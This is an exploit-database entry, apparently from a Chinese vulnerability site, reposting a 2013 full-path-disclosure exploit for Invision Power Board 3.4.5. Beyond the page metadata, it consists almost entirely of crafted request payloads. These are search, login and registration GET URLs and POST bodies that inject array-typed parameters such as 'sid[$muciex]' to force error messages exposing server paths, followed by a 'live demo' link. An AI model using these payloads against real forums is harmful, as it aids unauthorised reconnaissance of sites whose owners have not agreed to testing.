Invision Power Board 3.4.5 Full Path Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044550 漏洞类型
发布时间 2013-08-29 更新时间 2013-08-29
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080231
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Author: muciex
# Contact: muciex@vp.pl
#2013 29 August
#Version 3.4.5

www.forum/index.php?andor_type=and&app=core&do=search&module=search&search_app=core&search_app_filters[core][searchInKey]=&search_app_filters[core][sortDir]=1&search_app_filters[core][sortDir]=0&search_app_filters[core][sortKey]=date&search_author=1&search_content=both&search_date_end=01/01/1967&search_date_start=01/01/1967&search_term=1&sid[$muciex]=1

www.forum/index.php?andor_type=and&app=core&do=search&module=search&search_app=core&search_app_filters[core][searchInKey]=&search_app_filters[core][sortDir]=1&search_app_filters[core][sortDir]=0&search_app_filters[core][sortKey]=date&search_author=1&search_content=both&search_date_end=01/01/1967&search_date_start[$muciex]=1&search_term=1&sid=bcab3b404cf23d1b8d02ebd70d69f005

www.forum/index.php?app=core&do=process&module=global&section=login
[Post]
&auth_key=880ea6a14ea49e853634fbdc5015a024&ips_password=199990&ips_username=dcrojmpj&referer[$muciex]=1&rememberMe=1


www.forum/index.php?app=core&module=global&section=register
[Post]
agree_to_terms=1&agree_tos=1&allow_admin_mail=1&coppa_user=almdmpwf&do=process_form&dst=0&EmailAddress=3137 Laguna Street&members_display_name=almdmpwf&nexus_pass=1&PassWord=199990&PassWord_Check=199990&recaptcha_challenge_field=1&recaptcha_response_field[$muciex]=1&termsread=1&time_offset=0


#live demo http://epvpimg.com/k02Ch